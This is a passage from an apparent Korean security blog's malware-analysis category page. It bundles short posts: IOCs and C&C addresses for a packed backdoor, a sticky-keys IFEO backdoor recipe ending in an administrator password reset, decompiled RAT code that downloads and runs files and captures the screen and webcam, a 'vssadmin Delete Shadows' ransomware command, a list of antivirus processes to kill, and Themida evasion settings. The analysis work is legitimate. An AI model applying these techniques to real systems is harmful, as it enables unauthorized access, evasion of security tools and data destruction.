336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

IE9 호환성보기 목록 URL

 - http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

'Analysis > Malware' 카테고리의 다른 글

PEiD Signatures  (0) 2016.07.28
Packed.Dropper.PE  (0) 2016.07.27
[로컬 백도어] Image file execution option  (0) 2016.06.21
GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

http://handlers.sans.org/jclausing/userdb.txt
http://reverse-engineering-scripts.googlecode.com/files/UserDB.TXT
http://research.pandasecurity.com/blogs/images/userdb.txt

https://raw.githubusercontent.com/guelfoweb/peframe/5beta/peframe/signatures/userdb.txt #


pypeid > https://github.com/libcrack/python-peid


pefile > https://github.com/erocarrera/pefile

 - 내장된 peutils는 3.x버전이다. 2.x버전을 사용하기위해서는 peutils만 아래 파일로 import

   - python 2.7 > https://github.com/hiddenillusion/AnalyzePE/blob/master/peutils.py


'Analysis > Malware' 카테고리의 다른 글

IE9 호환성보기 목록  (0) 2016.08.03
Packed.Dropper.PE  (0) 2016.07.27
[로컬 백도어] Image file execution option  (0) 2016.06.21
GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

packed.zip


악성코드 정보.1
 - 종류 : Packed.Backdoor.PE(1)
 - md5 : 259c82d6db2883dd135c87b0feb44069

   ☞ 악성코드의 C&C 접속
     - IP: 190.185.124.125, Port:443
     - IP: 202.137.244.198, Port:443   
     - IP: 220.132.191.110, Port:443


악성코드 정보.2
 - 종류 : Packed.Dropper.PE
 - md5 : 036bae8dd72bd70761960a90ea631ff1

   ☞ 악성코드 드랍경로
     - %USERPROFILE%\AppData\Local\\Microsoft\Office\15.0\msoia.exe /update

     - 종류 : Packed.Backdoor.PE(2)
     - md5 : 133a436ddb128520d5061e020f09cb16

   ☞ 드랍된 악성코드 복제경로

     - %USERPROFILE%\AppData\Local\Microsoft\Internet Explorer\IECompatData\ielowutil.exe /autostart

     - 종류 : Packed.Backdoor.PE(2)
     - md5 : 133a436ddb128520d5061e020f09cb16

   ☞ 드랍된 악성코드의 C&C 접속
     - IP: 190.185.124.125, Port:443
     - IP: 202.137.244.198, Port:443   
     - IP: 220.132.191.110, Port:443



'Analysis > Malware' 카테고리의 다른 글

IE9 호환성보기 목록  (0) 2016.08.03
PEiD Signatures  (0) 2016.07.28
[로컬 백도어] Image file execution option  (0) 2016.06.21
GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

Image file execution option


레지스트리 경로
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image file execution options

sethc.exe > cmd.exe     //StickyKeys (SHIFT 키를 5번 연속 클릭 시 실행, system32\sethc.exe)

utilman.exe > cmd.exe  //접근성 표시(system32\utilman.exe)


부팅 후 로그인 화면

StickyKey(sethc.exe) 및 접근성 표시(utilman.exe) 실행 시 cmd.exe가 실행

cmd 실행 후

net user administrator <password>


*StickyKeys 기능해제
Accessibility Options > Keyboard > Settings > Use shotcut(disable)





'Analysis > Malware' 카테고리의 다른 글

PEiD Signatures  (0) 2016.07.28
Packed.Dropper.PE  (0) 2016.07.27
GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
Detection Name : GenPack:Trojan.Generic.2618737

MD5 : deaf01d9625d4104dbdc00eba37d7fc0


사용자 시스템 정보 수집

GetComputerNameA(&Buffer, &nSize)
GetVersionExA(&VersionInformation)
GlobalMemoryStatus((LPMEMORYSTATUS)&v15)


종료 및 재부팅

case 0x1000001:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0xCu, 0);
  break;
case 0x1000002:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x6u, 0);
  break;
case 0x1000003:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x4u, 0);
  break;


파일 다운로드 및 실행

wsprintfA(&v8, "abcdefg.exe");
GetTemppathA(0x104u, &CmdLine);
strcat(&CmdLine, "\\")
strcat(&CmdLine, &v8);
v1 = LoadLibraryA("urlmon.dll");
v2 = GetProcAddress(v1, "URLDownloadToFileA");
......
return WinExec(&CmdLine, 5u)


키보드/마우스 이벤트 API를 호출하여 제어

case 0x10000011:
  sub_300120(&v32);
  keybd_event(X[0], 0, 0, 0);
  sub_300170(&v32);
  break;
case 0x10000012:
  sub_300120(&v28);
  keybd_event(X[0], 0, 2u, 0);
  sub_300170(&v28);
  break;
case 0x10000013:
  sub_300120(&v30);
  SetCursorPos(*(int *)X, Y);
  sub_300170(&v30);
  break;
case 0x10000014:
  sub_300120(&v24);
  mouse_event(2u, 0, 0, 0, 0);
  sub_300170(&v24);
  break;
case 0x10000015:
  sub_300120(&v27);
  mouse_event(4u, 0, 0, 0, 0);
  sub_300170(&v27);
  break;


PC화면 스크린샷

CreateDC 함수 호출 후 전체 화면 DC 생성
CreateCompatibleDC 함수 호출 후 만들어진 전체 화면 DC를 호환되는 메모리 DC로 생성
CreateCompatibleBitmap 함수 호출 후 비트맵을 생성
BitBlt 함수를 호출 해서 메모리 DC에 화면 DC를 복사

v1 = this;
v2 = CreateDCA("DISPLAY", 0, 0, 0);
v3 = v2;
v4 = CreateCompatibleDC(v2);
v5 = v4;
v6 = v4;
v7 = CreateCompatibleBitmap(v3, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6));
SelectObject(v5, v7);
BitBlt(v5, 0, 0, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6), v3, 0, 0, 0xCC0020u);
............
GetDIBits(v6, v7, 0, *((_DWORD *)v1 + 6), (LPVOID)(*((_DWORD *)v1 + 1) + *((_DWORD *)v1 + 4)), (LPBITMAPINFO)v10, 0);
DeleteDC(v6);
DeleteDC(v3);
return DeleteObject(v7);


캠 도청

capCreateCaptureWindow 함수 호출 후 캡쳐 윈도우를 생성

C&C 서버에서 capDrivaerConnec 함수 호출 후 캡쳐 드라이브와 캡쳐 윈도우를 연결

v2 = CreateWindowExA(0, "#11220", WindowName, 0x80000000u, 0, 0, 0, 0, 0, 0, 0, 0);
*(_DWORD *)(v1 + 12) = v2;
*(_DWORD *)(v1 + 16) = capCreateCaptureWindowa("CVideoCap", 1342177280, 0, 0, 0, 0, v2, 0);



'Analysis > Malware' 카테고리의 다른 글

Packed.Dropper.PE  (0) 2016.07.27
[로컬 백도어] Image file execution option  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

Decrypted: Kaspersky releases free decryptor for CryptXXX Ransomware
출처 : http://www.bleepingcomputer.com/news/security/decrypted-kaspersky-releases-free-decryptor-for-cryptxxx-ransomware/


'Analysis > Malware' 카테고리의 다른 글

[로컬 백도어] Image file execution option  (0) 2016.06.21
GenPack:Trojan.Generic  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20
Anti-AV 센스  (0) 2016.06.20
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

갓모드[GodMode, CVE-2014-6332]

CVE-2014-6332 취약점은 윈도 OLE(Object Linking and Embedding) 자동화 배열 원격코드 실행 취약점으로,
인터넷 익스플로러(Internet Explorer, 이하 IE)가 OLE 객체를 처리하는 과정에서 원격으로 코드를 실행하는 취약점이다.
이 취약점은 IE​의 VBScript 엔진에서 배열의 크기를 재설정하는 과정에서 충분한 에러 처리를 수행하지 않아 발생한다.
배열의 크기를 재설정할 때 배열의 크기를 저장하고 있는 변수를 새로운 값으로 갱신하는데,
배열을 할당하는 과정에서 에러가 발생한 경우 이전 값으로 되돌리지 않는다.
따라서 초기 배열의 영역 이외의 메모리를 읽고, 쓰고, 접근하는 것이 가능하게 된다. 

참고 : http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?curPage=1&menu_dist=2&seq=23225

실버라이트 취약점 [CVE-2013-0074]
참고 : http://hummingbird.tistory.com/5406

플래시 취약점 [CVE-2014-0515]
참고 : http://hacklab.kr/?p=203


IP 체크

'http://checkip.dyndns.org/' 접속을 통한 공인IP 체크


PE 내장

악성코드에 securityxploded에서 제작된 툴을 내장하여 정보수집에 활용

http://securityxploded.com/download.php#exescan


랜섬웨어 - 볼륨 섀도 카피 삭제
악성코드는 ‘vssadmin.exe Delete Shadows/All/Quiet‘
명령을 실행하여 볼륨 섀도 카피를 삭제한다.
이 경우 윈도 운영체제에서 제공하는 파일 백업 및 복원 기능을 정상적으로 이용할 수 없다.
이 명령은 CryptLocker류에서 공통적으로 확인할 수 있는 기능이다.


시작프로그램 레지스트리

HKCU\Software\Microsoft\Windows\CureentVersion\Run\


시스템 디렉토리

%SystemRoot%\
%SystemRoot%\system\
%SystemRoot%\system32\
%SystemRoot%\system32\
%SystemRoot%\system32\dllcache
%SystemRoot%\system32\drivers
%SystemRoot%\SysWOW64\
%SystemRoot%\SysWOW64\dllcache
%SystemRoot%\SysWOW64\drivers


SysWOW64는 64비트 시스템에서만 존재하는 폴더로 32비트와의 호환성을 위해 존재하는 폴더이다.
“%SystemRoot%\system32\” 폴더에 64비트 시스템 파일이 위치한다면 “%SystemRoot%\SysWOW64\”에는 32비트 시스템 파일이 위치한다.
따라서, 64비트 시스템에서는 2개의 폴더를 모두 조사할 필요가 있다.


사용자 디렉토리

%SystemDrive%\Users\
%SystemDrive%\Users\Public\(%Public%)
%SystemDrive%\Users\Default\


사용자 데이터 디렉토리

%UserProfile%\AppData\
%UserProfile%\AppData\Local\(%LocalAppData%)
%UserProfile%\AppData\LocalLow\
%UserProfile%\AppData\Roaming\(%AppData%)
%SystemDrive%\ProgramData\(%AllUsersProfile%)


휴지통 디렉토리

%SystemDrive%\$Recycle.Bin\


사용자볼륨 디렉토리

%SystemDrive%\System Volume Information\


임시 디렉토리

%UserProfile%\AppData\Local\Temp = %Temp%
%SystemRoot%\Temp\
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\


웹브라우저 다운로드 디렉토리

%UserProfile%\Downloads
%UserProfile%\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\
%SystemRoot\Downloaded Program Files   //Active X


알려진 디렉토리

%SystemDrive%\HNC


기타 디렉토리

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
%SystemDrive%\Program Files\Common Files\ = %CommonProgramFiles%
%SystemDrive%\Program Files (x86)\Common Files\ = %CommonProgramFiles(x86)%

%UserProfile%
(=%HomePath%)
%Windir%
%LocalAppdata%
%Public%
%SystemRoot%
%Temp%
(=%TMP%)

'Analysis > Malware' 카테고리의 다른 글

GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20
Anti-AV 센스  (0) 2016.06.20
W32.Madangel  (0) 2016.04.07
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

웹사이트 참조 우선순위
 - 로컬시스템의 DNS Cache 정보
 - hosts.ics(internet connection sharing)
 - hosts
 - DNS


C:\Windows\System32\Drivers\etc\hosts 파일 변조
C:\Windows\System32\Drivers\etc\hosts.ics 생성


윈도우에서 캐시 초기화 ipconfig/flushdns, 수동 맵핑파일 {SystemDir}\drivers\etc\hosts

윈도우에서 캐시 리스트 확인 ipconfig/displaydns

리눅스(유닉스)에서는 기본적으로 dns 캐시를 사용하지 않는다. /etc/init.d/nscd restart (password/group/hosts캐시 초기화), 수동 맵핑파일 etc/hosts

MacOS X 10.4 이전 캐시 초기화  lookupd -flushdns, 수동 맵핑파일/etc/hosts
MacOS X 10.5 이후  캐시 초기화 dnscacheutil -flushdns, 수동 맵핑파일   /etc/hosts


익스플로어에서 DNS 캐시설정

https://support.microsoft.com/ko-kr/kb/263558

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

값 이름: DnsCacheTimeout
데이터 형식: REG_DWORD
단위: 10진수
값: (초 단위 시간)

값 이름: ServerInfoTimeOut
데이터 형식: REG_DWORD
단위: 10진수
값: (초 단위 시간)

파이어폭스에서 DNS 캐시설정

about:config 접속
network.dnsCacheEntries (캐시 항목 개수),
network.dnsCacheExpiration (캐시 기간, 단위: 초) 두 항목을 변경하거나 새로 추가한다.
entry 개수가 0이 되면 캐시를 전혀 하지 않는다. 복잡한 웹사이트 로딩시 속도 저하가 발생할 수 있다.


호스트 변조 바이러스 중 '파밍 악성코드'는 드라이브 바이 다운로드 공격을 주로 이용하며
Java,Flash,IE등의 취약점을 대다수 이용하는 다동 스크립트(Dadong's Script), 공다팩(Gongda Exploit Pack)등이 주를 이룬다.

'Analysis > Malware' 카테고리의 다른 글

GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Anti-AV 센스  (0) 2016.06.20
W32.Madangel  (0) 2016.04.07
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

Anti-AV 대상 프로세스

V3 Lite
V3LRun.exe
V3LTray.exe
V3LSvc.exe

V3 Internet Security
V3Up.exe
V3SP.exe
Mupdate2.exe
V3SVC.exe

SiteGuard
sgsvc.exe
sgui.exe
sgrun.exe

ASP
MYSFTY.exe

Online Security
Aosrts.exe

Antivir
avgnt.exe
avcenter.exe
avguard.exe
avscan.exe
avupgsvc.exe
avwsc.exe

Avast
avastsvc.exe
ashupd.exe
avastui.exe

AVG
avgam.exe
avgemc.exe
avgnsx.exe
avgrsx.exe
avgfrw.exe
avgwdsvc.exe
avgupd.exe

BitDefender
updatesrv.exe
seccenter.exe
bdagent.exe
bdagent.exe
bdreinit.exe

Eset
egui.exe
ekrn.exe

Kaspersky
Avp.exe

McAfree
shstat.exe
updaterui.exe
mctray.exe

MSE
msseces.exe

Symantec Norton
ccsvchst.exe
navw32.exe

Telus
vsserv.exe

Naver AV
NSVMon.npc
Nsavsvc.npc
NaverAgent.exe

Alyac
AYRTSRV.aye
AYupdsrv.aye
ayagent.aye

===================================


더미다를 이용한 백신우회 옵션


Protection Option
Anti-Debugger Detection - Ultra
Advanced API-Wrapping - Level2
Anti-Dumpers - Enable Protection
Anti-Patching - none
Entry Point Obfuscation - Enable Protection
Metamorph Security - Enable Protection
Resources Encryption - Disenable Protection
Memory Guard - Enable Protection
Monitor Blocker - Enable Enable
VMWare/VirtualPC - Compatible
When Dubugger Found : Crash App

Advanced Option
Encrypt Applications - Enable
.NET Assembles Checks - Enable
Protect as DLL Plugin - DisEnable
Active Context - DisEnable
Hide from PE scanners - Standard
Localization - English
Add Manifest - Don't add..
Splash screen settings - Display..



'Analysis > Malware' 카테고리의 다른 글

GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20
W32.Madangel  (0) 2016.04.07
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

W32.Madangel

W32.Madangel은 감염형 악성코드(웜)이다.

실행되면 다음과 같은 작업을 수행한다.

%Windir%\rundl132.exe //자기복사(W32.Madangel) %Windir%\Logo1_.exe //자기복사(W32.Madangel) %Windir%\vDll.dll //다운로드더 생성

참고:
%CurrentFolder% 악성코드가 실행된 디렉토리의 환경변수
%System% 시스템 디렉토리의 환경변수
C:\Windows\System (Windows 95/98/Me)
C:\Winnt\System32 (Windows NT/2000)
C:\Windows\System32 (Windows XP)

아래 레지스트리의 서브키를 체크하고 존재하면 프로세스를 종료한다.
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW
"auto" = "1"

iexplorer.exe 또는 explorer.exe에 vDll.dll을 인젝션한다.

vDll.dll은 다음 url에서 파일 다운로드를 시도한다.
hxxp://www.wowchian.com/dl[랜덤한 문자 2자리]

C to Y 드라이브까지 모든 드라이브의 실행파일을 찾아서 감염시킨다.
웜은 감염을 시도한 디렉토리에_desktop.ini 파일을 숨김속성으로 생성하고 시스템 설정 속성 및 웜이 실행 된 날짜를 저장한다.

다음과 같은 이름을 가진 디렉토리내의 파일들은 감염시키지 않는다.

system
system32
windows
Documents and Settings
System Volume Information
Recycled
winnt
Program Files
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
ComPlus Applications
NetMeeting
Common Files
Messenger
Microsoft Office
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gaming Zone

다음 IP주소로 "Hello,World" 문자열을 포함한 ICMP 패킷을 보낼 수 있다.

192.168.0.30
192.168.8.1


또한, 감염된 컴퓨터의 IP주소와 동일한 범위의 IP주소로 ICMP 패킷을 전송할 수 있다.
PC가 ICMP에 응답하는 경우 기본 공유폴더에 접근 시도를 한다.
\\ipc$
\\admin$

프로세스는 로컬 네트워크에있는 모든 컴퓨터와 공유 폴더를 접근 시도를 한다.
사용자계정과 암호를 사용하지 않거나 암호를 사용하지 않는 계정의 공유폴더를 열었을 경우
공유폴더에 존재하는 모든.exe파일을 감염시킨다



'Analysis > Malware' 카테고리의 다른 글

GenPack:Trojan.Generic  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20
Anti-AV 센스  (0) 2016.06.20

+ Recent posts